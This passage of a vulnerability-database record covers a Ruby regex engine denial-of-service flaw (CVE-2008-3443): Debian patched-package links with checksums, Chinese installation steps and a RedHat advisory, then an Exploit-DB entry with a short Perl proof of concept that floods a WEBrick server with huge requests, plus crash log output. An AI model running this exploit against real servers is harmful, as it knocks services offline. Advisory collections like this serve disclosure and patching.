rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 197594 fca3406a3b55cfdc69c8989b072ca031\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 802420 
6699c1bd4709051c910fc0bfe68c9b37\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 215980 2d9003c25275e1fd5ee6c53d959344f7\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 281536 fe8d5b309e7ab0be35e721e6b3ac97dd\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 217990 f096260bda09b34a2c2f8cf018c80ae1\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 1850962 60c4d783bcb2d0f852aa38fac3cad1d5\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 196670 16d12b430464de86499d897c2a28b213\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 1540332 5b40f3e2137e7753b54b3202a02f2fa9\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external 
nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 372286 2a9d8fc201caad40ceefb3cbd2a61d12\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 218178 0298e98b39cbf08fa18d4fe0d617df41\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 215442 2c78e52c5e2a619a0d3b436c1a887a53\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 1538434 b88e43e5cec1aacf83a598dab477c3ab\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 1667992 01b49904e244952345158c4e22006a42\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 299462 1e7905d97c9ec5f2dffdd8dd22b48002\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_mipsel.deb target=_blank rel=external 
nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 279298 5823c4a9baf7975c73eb6d36047dfed4\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 1059442 dba878a9064478b59f1548cf661041f7\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 793388 f945925d054d92aba8ca6f7e46a685ee\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 216340 c676c1ea64ad2b41ee571249b99568d9\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 197742 9dfdbf8675ab4a56dfbfdeaa7bb6f733\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 216192 3ec8e74d7b723d246719dd9227862c8a\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 
checksum: 367552 b0a7a4121cca96fc576497e5eeb7d664\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 858608 9f415ec47bba07a78331e26e35300a5b\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 1837532 6face0d7dcc576c00e564c66d5e78d42\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 198096 80b334507f4cbfc62b2a439e5d6f3f2e\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 235700 826646ac1e00564ab805d15ac64659bd\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 197150 b5c725b9fe159d6b3ddb9a1d607d5516\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 1830428 4123d91e58c7e5f0c4a784d5087f929e\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n<a 
href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 218314 45b937607b0c710f9651a88e3c77734a\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 1808952 c905cd43d26918def2c2110b0d0787b8\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 1844840 4698433b87fa56b6f7c8cf581f9ad4c0\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 777146 a01b49460afc4733cff7d1da5c3892ca\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 219458 02100fb307634e08fd304f830fa73115\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 372960 2e69a084e4ecc663d54a885b69cd4d87\r\n<a 
href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 199768 14727fe59c8a774dc0ce5283bbe3adf4\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 218562 6ef5bfa416e85714847e7911ad15b7bc\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 294044 404be1b8ba5d7b1de693949bf7509c50\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 237306 abd5d03c1a8c5e730fbbb3b7cbfc13a3\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 217678 56fc7c04ec11e80b958592b53698f2cb\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 312482 489f3cd6e21ef98d9b3d4031313e0ff8\r\n<a 
href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 199536 1a549205c85f26df75918ee1f5c5a5e6\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 1107170 e3be222facad68b2ea2c1d743bfe7729\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 200076 a9030c3b873cf7feca45d7fb18b2c1c5\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 1837356 f519218b7727c4c0064d87052a32cd57\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 719018 ff1d0ace8eeec5d602e0cc94c3b834ae\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_powerpc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_powerpc.deb</a>\r\nSize/MD5 checksum: 1592732 37cfd2a2da9ab0c297cd3e3e2d44d9b0\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external 
nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 327762 27db76dd87740f49cf998c08d7ab567c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 1855938 622f315ff7c5c3e488b364102dff54bd\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 217518 c56bb0699f151595c7cea6cc0d002476\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 217572 74f4d455673a8cedbbd19f03cd1a68bf\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 779594 1da6fea9a757a6147bccd1be029efc77\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 884422 dd7a11cbdee41fc9efbfeb616236c261\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 
checksum: 1849714 09fcada1e82f4f89b7cff7bb556ac055\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 235540 3431f6c302e74a70f0e31b13ee703c19\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 1052398 95816bfd6638c6c6cf7c8c91f8a5a6df\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 305308 1123e31b1920e3e7f1ac216eddaaba37\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 1838936 4accc47fcb960eaa9b04a6ff450c678b\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 218044 d92f877014b653c14260db06cfa0844e\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 199000 3c6e11cc181a6593505e20279d310a03\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_s390.deb target=_blank rel=external 
nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 198678 9b90584a77a43162a15087943f9596be\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 199480 65c1e5b6224a9a5ed5f1afe4053e9e97\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 218054 147f93ceaf0c8119ca264957ffc7c51a\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_s390.deb</a>\r\nSize/MD5 checksum: 371520 61de55d36d7fadd6f885a4021bebc229\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_s390.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_s390.deb</a>\r\nSize/MD5 checksum: 1620382 7a7339edea525e5d5bc6f8c794a8c3e7\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 197218 5ddc1259eef42b0c05439cb8ab731942\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 
197994 3ab96c368edc3bce77e73b529c4c5b84\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 1833286 c7f9f992093cacfb766259e889de13ba\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 960816 c43630f6bbb40fb21fffdc0ad516ddfe\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 197944 2d534c9e73f36b3b75e01f2f20bfb6c6\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 296102 c192762dbeaf435d11e51448565bc9b1\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 741330 59352ae48a97d10d96d23f84f8e3d4d7\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_sparc.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 1543188 313ab5a0048823ce919bf50a1b3f1de9\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_sparc.deb target=_blank rel=external 
nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_sparc.deb</a>\r\nSize/MD5 checksum: 217960 208c79695f22f705f70ecce79efa87b4\r\n\r\n\u8865\u4e01\u5b89\u88c5\u65b9\u6cd5\uff1a\r\n\r\n1. \u624b\u5de5\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u4e0b\u8f7d\u8865\u4e01\u8f6f\u4ef6\uff1a\r\n # wget url (url\u662f\u8865\u4e01\u4e0b\u8f7d\u94fe\u63a5\u5730\u5740)\r\n\r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u5b89\u88c5\u8865\u4e01\uff1a \r\n # dpkg -i file.deb (file\u662f\u76f8\u5e94\u7684\u8865\u4e01\u540d)\r\n\r\n2. \u4f7f\u7528apt-get\u81ea\u52a8\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u66f4\u65b0\u5185\u90e8\u6570\u636e\u5e93\uff1a\r\n # apt-get update\r\n \r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u5b89\u88c5\u66f4\u65b0\u8f6f\u4ef6\u5305\uff1a\r\n # apt-get upgrade\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2008:0897-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2008:0897-01\uff1aModerate: ruby security update\r\n\u94fe\u63a5\uff1a<a href=https://www.redhat.com/support/errata/RHSA-2008-0897.html target=_blank rel=external nofollow>https://www.redhat.com/support/errata/RHSA-2008-0897.html</a>", "modified": "2009-01-06T00:00:00", "published": "2009-01-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4621", "id": "SSV:4621", "title": "Ruby regex.c\u8fdc\u7a0b\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": ""}], "exploitdb": [{"lastseen": "2016-02-01T00:29:57", "bulletinFamily": "exploit", "description": "Ruby <= 1.9 (regex engine) Remote Socket Memory Leak Exploit. CVE-2008-3443. 
Dos exploits for multiple platform", "modified": "2008-08-13T00:00:00", "published": "2008-08-13T00:00:00", "id": "EDB-ID:6239", "href": "https://www.exploit-db.com/exploits/6239/", "type": "exploitdb", "title": "Ruby <= 1.9 regex engine Remote Socket Memory Leak Exploit", "sourceData": "-------------------------------------------------------\nLanguage : Ruby \n\nWeb Site: www.ruby-lang.org\n\nPlatform: All\n\nBug: Remote Socket Memory Leak\n\nProducts Affected:\n1.8 series:\n- 1.8.5 and all prior versions\n- 1.8.6-p286 and all prior versions\n- 1.8.7-p71 and all prior versions\n\n1.9 series\n- r18423 and all prior revisions\n\nConfirmed by the vendor: Yes\n\nPatch available : Yes\n-------------------------------------------------------\n\n1) Introduction\n2) Bug\n3) Proof of concept\n4) Credits\n\n===============\n1) Introduction\n===============\n\"A dynamic, open source programming language with a focus on simplicity and productivity.\nIt has an elegant syntax that is natural to read and easy to write.\"\n\n=======\n2) Bug\n=======\nRuby fails to handle properly the memory allocated for a socket\nSo when you send ~ 4 big request to a ruby socket, ruby will go \nin infinite loop, and then crash.\nThe bug reside in the regex engine (in regex.c).\n\n==================\n3)Proof of concept\n===================\nThis poc is an exemple for Webrick web server\ncrap.pl :\n\n#!/usr/bin/perl\nuse LWP::Simple;\nmy $payload = \"\\x41\" x 49999999;\nwhile(1)\n{\nprint \"[+]\\n\";\nget \"http://127.0.0.1:2500/\".$payload.\"\";\n}\n\nResult (Exemple on Webrick web server):\n\n[2008-07-11 22:39:55] INFO WEBrick 1.3.1\n[2008-07-11 22:39:55] INFO ruby 1.8.6 (2007-09-24) [i486-linux]\n[2008-07-11 22:39:55] INFO WEBrick::HTTPServer#start: pid=13850 port=2500\n[2008-07-11 22:40:51] ERROR NoMemoryError: failed to allocate memory\n /usr/lib/ruby/1.8/webrick/httprequest.rb:228:in `read_request_line'\n 